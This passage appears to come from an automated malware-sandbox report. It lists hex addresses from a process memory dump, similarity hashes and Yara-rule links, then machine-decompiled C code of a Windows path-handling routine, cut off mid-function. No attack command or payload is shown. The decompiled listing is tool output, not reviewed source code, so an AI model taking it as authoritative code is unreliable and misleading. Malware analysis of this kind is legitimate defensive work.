                                  0x1e3b0073
                                  0x1e3b0074
                                  0x00000000
                                  0x1e3afa7f
                                  0x1e3afa83
                                  0x1e3afa85
                                  0x1e405dae
                                  0x1e405dae
                                  0x1e3afa8b
                                  0x1e3afa8f
                                  0x1e3afa98
                                  0x1e3afaa1
                                  0x1e3afaa4
                                  0x1e3afaa6
                                  0x1e3afaa9
                                  0x1e3afaac
                                  0x1e405db7
                                  0x1e405dbd
                                  0x1e405dbd
                                  0x1e405db7
                                  0x1e3afab4
                                  0x00000000
                                  0x1e3afaba
                                  0x1e3afabc
                                  0x1e3afac2
                                  0x1e3afac5
                                  0x1e3afac7
                                  0x1e3afac7
                                  0x1e3afad6
                                  0x1e3afad9
                                  0x1e3afadf
                                  0x1e3afae2
                                  0x1e3afae4
                                  0x1e3afae7
                                  0x1e3afaea
                                  0x1e3afaed
                                  0x1e405dc4
                                  0x1e405dc9
                                  0x00000000
                                  0x00000000
                                  0x1e405dcf
                                  0x1e3afaf6
                                  0x1e3afafa
                                  0x1e3afafc
                                  0x1e3afafc
                                  0x1e3afafe
                                  0x1e3afb01
                                  0x1e3afb09
                                  0x1e3afb0c
                                  0x1e3afb12
                                  0x1e3afb14
                                  0x1e3afb17
                                  0x1e405dd6
                                  0x1e405dd9
                                  0x1e405dde
                                  0x00000000
                                  0x00000000
                                  0x1e405de4
                                  0x1e405de7
                                  0x1e3afb29
                                  0x1e3afb2c
                                  0x1e405df3
                                  0x1e405df6
                                  0x1e405e06
                                  0x1e405e0c
                                  0x1e405e0f
                                  0x1e405e11
                                  0x00000000
                                  0x1e405e1f
                                  0x00000000
                                  0x1e405e1f
                                  0x1e405e11
                                  0x1e405df8
                                  0x1e405dfb
                                  0x1e405e00
                                  0x00000000
                                  0x00000000
                                  0x1e405e02
                                  0x00000000
                                  0x1e405e02
                                  0x1e3afb32
                                  0x1e3afb35
                                  0x1e3afb3c
                                  0x1e405e26
                                  0x1e405e28
                                  0x1e405e28
                                  0x1e405e2e
                                  0x1e405e3c
                                  0x1e405e3c
                                  0x1e405e2e
                                  0x1e3afb45
                                  0x1e3afb47
                                  0x1e3afb53
                                  0x1e3afb56
                                  0x1e3afb59
                                  0x1e3afb5c
                                  0x1e3afb65
                                  0x1e3b000d
                                  0x00000000
                                  0x1e3b000f
                                  0x1e3b000f
                                  0x00000000
                                  0x1e3b000f
                                  0x1e3afb6b
                                  0x1e3afb6e
                                  0x1e3afb71
                                  0x1e3afb73
                                  0x1e3afb76
                                  0x1e405e45
                                  0x1e405e4b
                                  0x1e405e4b
                                  0x1e405e45
                                  0x1e3afb80
                                  0x1e3afb83
                                  0x1e405e54
                                  0x1e405e5a
                                  0x1e405e5a
                                  0x1e405e54
                                  0x1e3afb89
                                  0x1e3afb98
                                  0x1e3afb9b
                                  0x1e3afb9e
                                  0x1e3afba0
                                  0x1e405e63
                                  0x1e405e69
                                  0x1e405e69
                                  0x1e405e63
                                  0x1e3afba8
                                  0x00000000
                                  0x1e3afbae
                                  0x1e3afbb2
                                  0x1e405e70
                                  0x1e3afbb8
                                  0x1e3afbb8
                                  0x1e3afbb8
                                  0x1e3afbbd
                                  0x1e3afbbf
                                  0x1e3afbbf
                                  0x1e3af9a8
                                  0x1e3af9a8
                                  0x1e3af9ad
                                  0x1e3af9b4
                                  0x1e405eda
                                  0x00000000
                                  0x00000000
                                  0x1e405ee2
                                  0x1e3af9bc
                                  0x1e3af9bc
                                  0x1e3af9bf
                                  0x1e3af9c4
                                  0x1e3afde6
                                  0x1e3afde9
                                  0x1e3afdec
                                  0x1e3afdef
                                  0x1e3afdf2
                                  0x1e405eeb
                                  0x1e405ef1
                                  0x1e405ef1
                                  0x1e405eeb
                                  0x1e3afdfa
                                  0x00000000
                                  0x1e3afe00
                                  0x1e3afe04
                                  0x1e405efa
                                  0x1e405f00
                                  0x1e405f00
                                  0x1e405efa
                                  0x1e3afe0a
                                  0x1e3afa24
                                  0x1e3afa2a
                                  0x1e3afa2a
                                  0x1e3afdfa
                                  0x1e3af9cd
                                  0x00000000
                                  0x1e3af9cf
                                  0x1e3af9cf
                                  0x1e3af9d1
                                  0x1e3af9d4
                                  0x1e3af9d7
                                  0x1e3af9d9
                                  0x1e3af9dc
                                  0x1e3af9df
                                  0x1e3af9e2
                                  0x1e3af9e7
                                  0x1e405f09
                                  0x00000000
                                  0x00000000
                                  0x1e405f11
                                  0x1e3af9ef
                                  0x1e3af9f3
                                  0x1e3afed5
                                  0x1e3afed8
                                  0x1e3afedb
                                  0x1e405f1a
                                  0x1e405f20
                                  0x1e405f20
                                  0x1e405f1a
                                  0x1e3afee3
                                  0x00000000
                                  0x1e3afee9
                                  0x1e3afeeb
                                  0x1e405f29
                                  0x1e405f2f
                                  0x1e405f2f
                                  0x1e405f29
                                  0x1e3afef3
                                  0x00000000
                                  0x1e3afef9
                                  0x1e3afefc
                                  0x1e3aff01
                                  0x1e405f38
                                  0x1e3b0052
                                  0x1e3b0054
                                  0x00000000
                                  0x1e3b0056
                                  0x1e3b0056
                                  0x1e3aff40
                                  0x1e3aff42
                                  0x1e405f6e
                                  0x1e405f74
                                  0x1e405f74
                                  0x1e405f6e
                                  0x1e3aff50
                                  0x1e3aff56
                                  0x1e3aff5b
                                  0x1e405f7d
                                  0x00000000
                                  0x00000000
                                  0x1e405f83
                                  0x00000000
                                  0x1e3aff61
                                  0x1e3aff61
                                  0x1e3aff63
                                  0x1e3b0021
                                  0x1e3b0026
                                  0x1e3b002b
                                  0x1e3b007e
                                  0x1e3b0080
                                  0x1e3b0080
                                  0x1e3b007e
                                  0x1e3b002f
                                  0x00000000
                                  0x1e3b0031
                                  0x1e3b0033
                                  0x1e3b0086
                                  0x1e3b0035
                                  0x1e3b0035
                                  0x1e3b0035
                                  0x1e3b003c
                                  0x00000000
                                  0x1e3b003c
                                  0x1e3b002f
                                  0x1e3aff69
                                  0x1e3aff6b
                                  0x1e405f8c
                                  0x1e405f92
                                  0x1e405f92
                                  0x1e405f8c
                                  0x1e3aff74
                                  0x1e3aff77
                                  0x1e3aff7b
                                  0x1e405f99
                                  0x1e405f9b
                                  0x1e3aff81
                                  0x1e3aff81
                                  0x1e3aff83
                                  0x1e3aff83
                                  0x1e3aff88
                                  0x1e3aff8b
                                  0x1e3aff90
                                  0x1e3aff92
                                  0x1e3aff92
                                  0x1e3aff9c
                                  0x1e3affa2
                                  0x1e3affa6
                                  0x1e3affaa
                                  0x1e3affad
                                  0x1e3affb2
                                  0x1e405fa4
                                  0x1e405faa
                                  0x1e405faa
                                  0x1e405fa4
                                  0x1e3affb8
                                  0x00000000
                                  0x1e3affb8
                                  0x1e3aff5b
                                  0x1e3b0054
                                  0x1e405f3e
                                  0x1e405f3e
                                  0x1e3aff09
                                  0x00000000
                                  0x00000000
                                  0x1e3aff0f
                                  0x1e3aff14
                                  0x1e405f47
                                  0x1e405f4d
                                  0x1e405f4d
                                  0x1e405f47
                                  0x1e3aff1c
                                  0x1e3b0046
                                  0x1e3b0076
                                  0x1e3b0078
                                  0x00000000
                                  0x1e3b0048
                                  0x1e3b0048
                                  0x1e3b004a
                                  0x1e3b004a
                                  0x00000000
                                  0x1e3b004a
                                  0x1e3aff22
                                  0x1e3aff22
                                  0x1e3aff26
                                  0x1e405f56
                                  0x1e405f5c
                                  0x1e405f5c
                                  0x1e405f56
                                  0x1e3aff2e
                                  0x00000000
                                  0x1e3aff34
                                  0x1e3aff36
                                  0x1e405f65
                                  0x1e3aff3c
                                  0x1e3aff3c
                                  0x1e3aff3c
                                  0x1e3aff3e
                                  0x00000000
                                  0x1e3aff3e
                                  0x1e3aff2e
                                  0x1e3aff1c
                                  0x1e3afef3
                                  0x1e3afee3
                                  0x1e3af9f9
                                  0x1e3af9f9
                                  0x1e3af9fb
                                  0x1e3af9ff
                                  0x1e3afbd5
                                  0x1e405fb1
                                  0x1e405fb1
                                  0x1e3afbdf
                                  0x00000000
                                  0x1e3afbe5
                                  0x1e3afbe5
                                  0x1e3afbe8
                                  0x1e3afbed
                                  0x1e405fdf
                                  0x1e3afc01
                                  0x1e3afc01
                                  0x1e3afc04
                                  0x1e3afc09
                                  0x1e405fee
                                  0x1e405ff4
                                  0x1e405ff4
                                  0x1e405fee
                                  0x1e3afc0f
                                  0x1e3afc13
                                  0x1e3afc1d
                                  0x1e3afc20
                                  0x1e3afc23
                                  0x1e3afc26
                                  0x1e3afc2b
                                  0x1e405ffd
                                  0x1e406003
                                  0x1e406003
                                  0x1e405ffd
                                  0x1e3afc33
                                  0x00000000
                                  0x1e3afc39
                                  0x1e3afc3b
                                  0x1e3afc3e
                                  0x1e3afc41
                                  0x1e3afc46
                                  0x1e40600c
                                  0x1e406012
                                  0x1e406012
                                  0x1e40600c
                                  0x1e3afc4e
                                  0x00000000
                                  0x1e3afc54
                                  0x1e3afc54
                                  0x1e3afc59
                                  0x1e40601b
                                  0x1e406021
                                  0x1e406021
                                  0x1e40601b
                                  0x1e3afc61
                                  0x00000000
                                  0x1e3afc67
                                  0x1e3afc6a
                                  0x1e3afc6f
                                  0x1e40602a
                                  0x1e406030
                                  0x1e406030
                                  0x1e40602a
                                  0x1e3afc77
                                  0x00000000
                                  0x1e3afc7d
                                  0x1e3afc7f
                                  0x1e3afc81
                                  0x1e3afc85
                                  0x1e3afc87
                                  0x1e3afc87
                                  0x1e3afc8c
                                  0x1e3afc8f
                                  0x1e3afc94
                                  0x1e406039
                                  0x1e3afc9c
                                  0x1e3afca4
                                  0x1e3afcaa
                                  0x1e3afcaf
                                  0x1e406046
                                  0x1e3afcbd
                                  0x1e3afcbf
                                  0x1e40606d
                                  0x1e406073
                                  0x1e406073
                                  0x1e40606d
                                  0x1e3afcc8
                                  0x1e3afccd
                                  0x1e3afccf
                                  0x1e3afcd3
                                  0x1e3afcd5
                                  0x1e3afcd5
                                  0x1e3afcde
                                  0x1e3afce1
                                  0x1e3afce3
                                  0x1e3afce3
                                  0x1e3afce8
                                  0x1e3afcf0
                                  0x1e3afcf2
                                  0x1e3afcf5
                                  0x1e3afcf7
                                  0x1e3afcff
                                  0x1e3afd02
                                  0x1e3afd06
                                  0x1e3afd11
                                  0x1e3afd14
                                  0x1e3afd17
                                  0x1e40607c
                                  0x1e406082
                                  0x1e406082
                                  0x1e40607c
                                  0x1e3afd1f
                                  0x00000000
                                  0x1e3afd25
                                  0x1e3afd28
                                  0x1e3afd2d
                                  0x1e40608b
                                  0x1e406091
                                  0x1e406091
                                  0x1e40608b
                                  0x1e3afd35
                                  0x00000000
                                  0x1e3afd3b
                                  0x1e3afd3e
                                  0x1e3afd43
                                  0x1e40609a
                                  0x1e3b0016
                                  0x1e3b0018
                                  0x00000000
                                  0x1e3b001a
                                  0x1e3b001a
                                  0x1e3afd82
                                  0x1e3afd84
                                  0x1e4060d9
                                  0x1e4060df
                                  0x1e4060df
                                  0x1e4060d9
                                  0x1e3afd8d
                                  0x1e3afd95
                                  0x1e3afd98
                                  0x1e3afd9d
                                  0x1e4060e8
                                  0x00000000
                                  0x00000000
                                  0x1e4060ee
                                  0x00000000
                                  0x1e3afda3
                                  0x1e3afda3
                                  0x1e3afda5
                                  0x1e3afe8b
                                  0x1e3afe90
                                  0x1e3afe95
                                  0x1e4060f7
                                  0x1e4060fd
                                  0x1e4060fd
                                  0x1e4060f7
                                  0x1e3afe9d
                                  0x00000000
                                  0x1e3afea3
                                  0x1e3afea5
                                  0x1e406106
                                  0x1e3afeab
                                  0x1e3afeab
                                  0x1e3afeab
                                  0x1e3afeb2
                                  0x1e3afeb5
                                  0x00000000
                                  0x1e3afeb5
                                  0x1e3afe9d
                                  0x1e3afdab
                                  0x1e3afdad
                                  0x1e40610f
                                  0x1e406115
                                  0x1e406115
                                  0x1e40610f
                                  0x1e3afdb6
                                  0x1e3afdbb
                                  0x1e40611e
                                  0x1e406120
                                  0x1e3afdc1
                                  0x1e3afdc1
                                  0x1e3afdc5
                                  0x1e3afdc5
                                  0x1e3afdc7
                                  0x1e3afdcc
                                  0x1e3afdce
                                  0x1e3afdce
                                  0x1e3afdd6
                                  0x1e3afdd8
                                  0x00000000
                                  0x1e3afdd8
                                  0x1e3afd9d
                                  0x1e3b0018
                                  0x1e4060a0
                                  0x1e4060a0
                                  0x1e3afd4b
                                  0x00000000
                                  0x00000000
                                  0x1e3afd51
                                  0x1e3afd56
                                  0x1e4060a9
                                  0x1e4060af
                                  0x1e4060af
                                  0x1e4060a9
                                  0x1e3afd5e
                                  0x1e3afebf
                                  0x1e4060b8
                                  0x1e3afec5
                                  0x1e3afec5
                                  0x1e3afec5
                                  0x1e3afec7
                                  0x00000000
                                  0x1e3afd64
                                  0x1e3afd64
                                  0x1e3afd68
                                  0x1e4060c1
                                  0x1e4060c7
                                  0x1e4060c7
                                  0x1e4060c1
                                  0x1e3afd70
                                  0x00000000
                                  0x1e3afd76
                                  0x1e3afd78
                                  0x1e4060d0
                                  0x1e3afd7e
                                  0x1e3afd7e
                                  0x1e3afd7e
                                  0x1e3afd80
                                  0x00000000
                                  0x1e3afd80
                                  0x1e3afd70
                                  0x1e3afd5e
                                  0x1e3afd35
                                  0x1e3afd1f
                                  0x1e40604c
                                  0x1e40604c
                                  0x1e3afcb7
                                  0x1e3affc0
                                  0x1e3affc3
                                  0x1e3affc6
                                  0x1e3affcb
                                  0x1e406055
                                  0x1e40605b
                                  0x1e40605b
                                  0x1e406055
                                  0x1e3affd3
                                  0x00000000
                                  0x1e3affd9
                                  0x1e3affdb
                                  0x1e406064
                                  0x1e3affe1
                                  0x1e3affe1
                                  0x1e3affe1
                                  0x1e3affe3
                                  0x1e3affe7
                                  0x1e3affed
                                  0x00000000
                                  0x1e3affed
                                  0x1e3affd3
                                  0x00000000
                                  0x1e3afcb7
                                  0x1e40603f
                                  0x1e3afc9a
                                  0x00000000
                                  0x1e3afc9a
                                  0x1e3afc77
                                  0x1e3afc61
                                  0x1e3afc4e
                                  0x1e3afc33
                                  0x1e405fe5
                                  0x1e405fe5
                                  0x1e3afbf5
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e3afbf5
                                  0x1e3afbdf
                                  0x1e3afa05
                                  0x1e3afa05
                                  0x1e3afa0a
                                  0x1e3afe14
                                  0x1e405fb8
                                  0x1e405fb8
                                  0x1e3afe1e
                                  0x00000000
                                  0x1e3afe24
                                  0x00000000
                                  0x1e3afe24
                                  0x1e3afe1e
                                  0x1e3afa10
                                  0x1e3afa10
                                  0x1e3afa15
                                  0x1e3afe29
                                  0x1e3afe2d
                                  0x1e3afe35
                                  0x1e3afe38
                                  0x1e3afe3b
                                  0x1e405fc1
                                  0x00000000
                                  0x00000000
                                  0x1e405fc7
                                  0x1e3afe43
                                  0x1e3afe45
                                  0x00000000
                                  0x00000000
                                  0x1e3afe4b
                                  0x1e3afe50
                                  0x1e405fd0
                                  0x1e405fd6
                                  0x1e405fd6
                                  0x1e405fd0
                                  0x1e3afe5d
                                  0x1e3afe60
                                  0x00000000
                                  0x1e3afe60
                                  0x1e3afe41
                                  0x1e3afe41
                                  0x00000000
                                  0x1e3afa1b
                                  0x1e3afa1b
                                  0x1e3afa1d
                                  0x1e3afa20
                                  0x00000000
                                  0x1e3afa20
                                  0x1e3afa15
                                  0x1e3af9ed
                                  0x1e3af9ed
                                  0x00000000
                                  0x1e3af9ed
                                  0x1e3af9cd
                                  0x1e3af9ba
                                  0x1e3af9ba
                                  0x00000000
                                  0x1e3af9ba
                                  0x1e3afba8
                                  0x1e3afb65
                                  0x1e3afb1d
                                  0x1e3afb23
                                  0x1e3afb26
                                  0x00000000
                                  0x1e3afb26
                                  0x1e3afaf3
                                  0x1e3afaf3
                                  0x00000000
                                  0x1e3afaf3
                                  0x1e3afab4
                                  0x1e3afa79
                                  0x1e3afa56
                                  0x1e3afa56
                                  0x00000000
                                  0x1e3afa56
                                  0x1e3af94d
                                  0x1e3af950
                                  0x1e3af955
                                  0x1e405e79
                                  0x1e405e7f
                                  0x1e405e7f
                                  0x1e405e79
                                  0x1e3af95b
                                  0x1e3af960
                                  0x1e405e88
                                  0x1e405e8a
                                  0x1e405e8a
                                  0x1e405e8e
                                  0x1e405e93
                                  0x00000000
                                  0x1e405e99
                                  0x1e405e9c
                                  0x1e405e9f
                                  0x1e405ea1
                                  0x1e405ea3
                                  0x1e405ea3
                                  0x1e405ea7
                                  0x00000000
                                  0x1e405ea7
                                  0x1e3af966
                                  0x1e3af966
                                  0x1e3af96b
                                  0x1e405eb0
                                  0x1e405eb6
                                  0x1e405eb6
                                  0x1e405eb0
                                  0x1e3af973
                                  0x1e3afbc7
                                  0x1e3af9a5
                                  0x1e3af9a5
                                  0x00000000
                                  0x1e3af979
                                  0x1e3af97d
                                  0x1e3af97f
                                  0x1e405ebf
                                  0x1e405ec5
                                  0x1e405ec5
                                  0x1e405ebf
                                  0x1e3af987
                                  0x00000000
                                  0x1e3af98d
                                  0x1e3af98d
                                  0x1e3af990
                                  0x1e3af994
                                  0x1e3af997
                                  0x1e3af99f
                                  0x1e3afff7
                                  0x1e3b0061
                                  0x1e3b0064
                                  0x1e3b006a
                                  0x1e405ece
                                  0x1e405ed0
                                  0x1e405ed0
                                  0x00000000
                                  0x1e3b0064
                                  0x1e3afffd
                                  0x1e3b0000
                                  0x00000000
                                  0x1e3b0006
                                  0x1e405ecc
                                  0x00000000
                                  0x1e405ecc
                                  0x1e3b0000
                                  0x00000000
                                  0x1e3af99f
                                  0x1e3af987
                                  0x1e3af973

                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.373307377.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000B.00000002.373418274.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000B.00000002.373424599.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fc66cec98a30fadb5342584c4926ef08b8d30d1ee31ce6150576712f1cb138a4
                                  • Instruction ID: 8b77b0b3f4dffe1095aa4dcea0b2e9cf76e7309d44d1d1d9d5345bbc224d576f
                                  • Opcode Fuzzy Hash: fc66cec98a30fadb5342584c4926ef08b8d30d1ee31ce6150576712f1cb138a4
                                  • Instruction Fuzzy Hash: 3F62B331E146929BCB22CE25C45029AFBA7EF85354F2983A9CD94DB389D375D9C1CBC0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00088132, Relevance: .5, Instructions: 513COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.368689957.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e27f183078115b9e4f8fe20dd9ef32afe9fe95e7fab8d9d706de258247787a69
                                  • Instruction ID: 5625e342a342fde264604ef3762596a71ed9ec8187ac78f6cb7808236885ec77
                                  • Opcode Fuzzy Hash: e27f183078115b9e4f8fe20dd9ef32afe9fe95e7fab8d9d706de258247787a69
                                  • Instruction Fuzzy Hash: BEE1F472BA86404BC71CDE18DCC26B973DAE7CA309F59943DE4C7C7247DA29D5038A49
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E3C6E30, Relevance: .5, Instructions: 481COMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 95%
                                  			E1E3C6E30(signed short __ecx, signed short __edx, signed int _a4, intOrPtr* _a8, char* _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				char _v20;
				signed int _v32;
				signed short _v34;
				intOrPtr _v36;
				signed short _v38;
				signed short _v40;
				char _v41;
				signed int _v48;
				short _v50;
				signed int _v52;
				signed short _v54;
				signed int _v56;
				char _v57;
				signed int _v64;
				signed int _v68;
				signed short _v70;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed short _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				unsigned int _v116;
				signed int _v120;
				signed int _v124;
				unsigned int _v128;
				char _v136;
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				void* __ebp;
				signed int _t312;
				signed int _t313;
				char* _t315;
				unsigned int _t316;
				signed int _t317;
				short* _t319;
				void* _t320;
				signed int _t321;
				signed short _t327;
				signed int _t328;
				signed int _t335;
				signed short* _t336;
				signed int _t337;
				signed int _t338;
				signed int _t349;
				signed short _t352;
				signed int _t357;
				signed int _t360;
				signed int _t363;
				void* _t365;
				signed int _t366;
				signed short* _t367;
				signed int _t369;
				signed int _t375;
				signed int _t379;
				signed int _t384;
				signed int _t386;
				void* _t387;
				signed short _t389;
				intOrPtr* _t392;
				signed int _t397;
				unsigned int _t399;
				signed int _t401;
				signed int _t402;
				signed int _t407;
				void* _t415;
				signed short _t417;
				unsigned int _t418;
				signed int _t419;
				signed int _t420;
				signed int _t422;
				intOrPtr* _t433;
				signed int _t435;
				void* _t436;
				signed int _t437;
				signed int _t438;
				signed int _t440;
				signed short _t443;
				void* _t444;
				signed int _t445;
				signed int _t446;
				signed int _t449;
				signed int _t450;
				signed int _t451;
				signed int _t452;
				signed int _t453;

				_t425 = __edx;
				_push(0xfffffffe);
				_push(0x1e47fca8);
				_push(0x1e3f17f0);
				_push( *[fs:0x0]);
				_t312 =  *0x1e49d360;
				_v12 = _v12 ^ _t312;
				_t313 = _t312 ^ _t453;
				_v32 = _t313;
				_push(_t313);
				 *[fs:0x0] =  &_v20;
				_v116 = __edx;
				_t443 = __ecx;
				_v88 = __ecx;
				_t386 = _a4;
				_t433 = _a8;
				_v112 = _t433;
				_t315 = _a12;
				_v64 = _t315;
				_t392 = _a16;
				_v108 = _t392;
				if(_t433 != 0) {
					 *_t433 = 0;
				}
				if(_t315 != 0) {
					 *_t315 = 0;
				}
				if(_t425 > 0xffff) {
					_v116 = 0xffff;
				}
				 *_t392 = 0;
				 *((intOrPtr*)(_t392 + 4)) = 0;
				_t316 =  *_t443 & 0x0000ffff;
				_v104 = _t316;
				_t435 = _t316 >> 1;
				_v120 = _t435;
				if(_t435 == 0) {
					L124:
					_t317 = 0;
					goto L60;
				} else {
					_t319 =  *((intOrPtr*)(_t443 + 4));
					if( *_t319 != 0) {
						_t397 = _t435;
						_t320 = _t319 + _t435 * 2;
						_t425 = _t320 - 2;
						while(_t397 != 0) {
							if( *_t425 == 0x20) {
								_t397 = _t397 - 1;
								_t425 = _t425 - 2;
								continue;
							}
							if(_t397 == 0) {
								goto L124;
							}
							_t321 =  *(_t320 - 2) & 0x0000ffff;
							if(_t321 == 0x5c || _t321 == 0x2f) {
								_v57 = 0;
							} else {
								_v57 = 1;
							}
							_t399 = _v116 >> 1;
							_v92 = _t399;
							_v128 = _t399;
							E1E3EFA60(_t386, 0, _v116);
							_v56 = 0;
							_v52 = 0;
							_v50 = _v92 + _v92;
							_v48 = _t386;
							_t327 = E1E3C74C0(_t443);
							if(_t327 != 0) {
								_t389 = _t327 >> 0x10;
								_t328 = _t327 & 0x0000ffff;
								_v112 = _t328;
								_t437 = _v64;
								if(_t437 == 0) {
									L122:
									_t438 = _t328 + 8;
									_t401 = _v92;
									if(_t438 >= (_t401 + _t401 & 0x0000ffff)) {
										_t209 = _t438 + 2; // 0xddeeddf0
										_t402 = _t209;
										asm("sbb eax, eax");
										_t317 =  !0xffff & _t402;
									} else {
										E1E3D9BC6( &_v52, 0x1e381080);
										_t425 =  *((intOrPtr*)(_t443 + 4)) + (_t389 >> 1) * 2;
										E1E3E9377( &_v52,  *((intOrPtr*)(_t443 + 4)) + (_t389 >> 1) * 2, _v112);
										_t317 = _t438;
									}
									goto L60;
								}
								if(_t389 != 0) {
									_t425 = _t389;
									_t335 = E1E4246A7(_t443, _t389, _t437);
									if(_t335 < 0) {
										goto L124;
									}
									if( *_t437 != 0) {
										goto L124;
									}
									_t328 = _v112;
								}
								goto L122;
							} else {
								_t425 = _t443;
								_t336 =  *(_t425 + 4);
								_t407 =  *_t425 & 0x0000ffff;
								if(_t407 < 2) {
									L17:
									if(_t407 < 4 ||  *_t336 == 0 || _t336[1] != 0x3a) {
										_t337 = 5;
									} else {
										if(_t407 < 6) {
											L98:
											_t337 = 3;
											L23:
											 *_v108 = _t337;
											_t409 = 0;
											_v72 = 0;
											_v68 = 0;
											_v64 = 0;
											_v84 = 0;
											_v41 = 0;
											_t445 = 0;
											_v76 = 0;
											_v8 = 0;
											if(_t337 != 2) {
												_t338 = _t337 - 1;
												if(_t338 > 6) {
													L164:
													_t446 = 0;
													_v64 = 0;
													_t439 = _v92;
													goto L59;
												}
												switch( *((intOrPtr*)(_t338 * 4 +  &M1E3C749C))) {
													case 0:
														__ecx = 0;
														__eflags = 0;
														_v124 = 0;
														__esi = 2;
														while(1) {
															_v100 = __esi;
															__eflags = __esi - __edi;
															if(__esi >= __edi) {
																break;
															}
															__eax =  *(__edx + 4);
															__eax =  *( *(__edx + 4) + __esi * 2) & 0x0000ffff;
															__eflags = __eax - 0x5c;
															if(__eax == 0x5c) {
																L140:
																__ecx = __ecx + 1;
																_v124 = __ecx;
																__eflags = __ecx - 2;
																if(__ecx == 2) {
																	break;
																}
																L141:
																__esi = __esi + 1;
																continue;
															}
															__eflags = __eax - 0x2f;
															if(__eax != 0x2f) {
																goto L141;
															}
															goto L140;
														}
														__eax = __esi;
														_v80 = __esi;
														__eax =  *(__edx + 4);
														_v68 =  *(__edx + 4);
														__eax = __esi + __esi;
														_v72 = __ax;
														__eax =  *(__edx + 2) & 0x0000ffff;
														_v70 = __ax;
														_v76 = __esi;
														goto L80;
													case 1:
														goto L164;
													case 2:
														__eax = E1E3A52A5(__ecx);
														_v84 = __eax;
														_v41 = 1;
														__eflags = __eax;
														if(__eax == 0) {
															__eax =  *[fs:0x30];
															__ebx =  *(__eax + 0x10);
															__ebx =  *(__eax + 0x10) + 0x24;
														} else {
															__ebx = __eax + 0xc;
														}
														 *(__ebx + 4) =  *( *(__ebx + 4)) & 0x0000ffff;
														__eax = L1E3B2600( *( *(__ebx + 4)) & 0x0000ffff);
														__si = __ax;
														_v88 =  *(_v88 + 4);
														__ecx =  *( *(_v88 + 4)) & 0x0000ffff;
														__eax = L1E3B2600( *( *(_v88 + 4)) & 0x0000ffff);
														_v54 = __ax;
														__eflags = __ax - __ax;
														if(__eflags != 0) {
															__cx = __ax;
															L1E424735(__ecx, __edx, __eflags) = 0x3d;
															_v40 = __ax;
															__si = _v54;
															_v38 = __si;
															_v36 = 0x3a;
															 &_v40 =  &_v136;
															E1E3EBB40(__ecx,  &_v136,  &_v40) =  &_v52;
															__eax =  &_v136;
															__eax = E1E3D2010(__ecx, 0,  &_v136,  &_v52);
															__eflags = __eax;
															if(__eax >= 0) {
																__ax = _v52;
																_v56 = __eax;
																__edx = __ax & 0x0000ffff;
																__ecx = __edx;
																__ecx = __edx >> 1;
																_v100 = __ecx;
																__eflags = __ecx - 3;
																if(__ecx <= 3) {
																	L155:
																	__ebx = _v48;
																	L156:
																	_v72 = __ax;
																	goto L119;
																}
																__eflags = __ecx - _v92;
																if(__ecx >= _v92) {
																	goto L155;
																}
																__esi = 0x5c;
																__ebx = _v48;
																 *(__ebx + __ecx * 2) = __si;
																__eax = __edx + 2;
																_v56 = __edx + 2;
																_v52 = __ax;
																goto L156;
															}
															__eflags = __eax - 0xc0000023;
															if(__eax != 0xc0000023) {
																__eax = 0;
																_v52 = __ax;
																_v40 = __si;
																_v38 = 0x5c003a;
																_v34 = __ax;
																__edx =  &_v40;
																__ecx =  &_v52;
																L1E424658(__ecx,  &_v40) = 8;
																_v72 = __ax;
																__ebx = _v48;
																__ax = _v52;
																_v56 = 8;
																goto L119;
															}
															__ax = _v52;
															_v56 = __eax;
															__eax = __ax & 0x0000ffff;
															__eax = (__ax & 0x0000ffff) + 2;
															_v64 = __eax;
															__eflags = __eax - 0xffff;
															if(__eax <= 0xffff) {
																_v72 = __ax;
																__ebx = _v48;
																goto L119;
															}
															__esi = 0;
															_v64 = 0;
															__ebx = _v48;
															__edi = _v92;
															goto L58;
														} else {
															__eax =  *__ebx;
															_v72 =  *__ebx;
															__eax =  *(__ebx + 4);
															_v68 =  *(__ebx + 4);
															__edx =  &_v72;
															__ecx =  &_v52;
															__eax = E1E3D9BC6(__ecx,  &_v72);
															__ebx = _v48;
															__eax = _v52 & 0x0000ffff;
															_v56 = _v52 & 0x0000ffff;
															L119:
															__eax = 3;
															_v80 = 3;
															__esi = 2;
															_v76 = 2;
															__edx = _v88;
															goto L25;
														}
													case 3:
														__eax = E1E3A52A5(__ecx);
														_v84 = __eax;
														_v41 = 1;
														__eflags = __eax;
														if(__eax == 0) {
															__eax =  *[fs:0x30];
															__ebx =  *(__eax + 0x10);
															__ebx =  *(__eax + 0x10) + 0x24;
															__eflags = __ebx;
															__esi = _v76;
														} else {
															__ebx = __eax + 0xc;
														}
														__ecx = __ebx;
														__eax = L1E3A83AE(__ebx);
														_v80 = __eax;
														__ecx =  *__ebx;
														_v72 =  *__ebx;
														__ecx =  *(__ebx + 4);
														_v68 = __ecx;
														__eflags = __eax - 3;
														if(__eax == 3) {
															__eax = 4;
															_v72 = __ax;
														} else {
															__ecx = __eax + __eax;
															_v72 = __cx;
														}
														goto L80;
													case 4:
														_t340 = E1E3A52A5(0);
														_v84 = _t340;
														_v41 = 1;
														__eflags = _t340;
														if(_t340 == 0) {
															_t428 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
															_t445 = _v76;
														} else {
															_t428 = _t340 + 0xc;
															 *((intOrPtr*)(_v108 + 4)) =  *((intOrPtr*)(_t340 + 0x14));
														}
														_v72 =  *_t428;
														_v68 = _t428[2];
														_v80 = L1E3A83AE(_t428);
														L80:
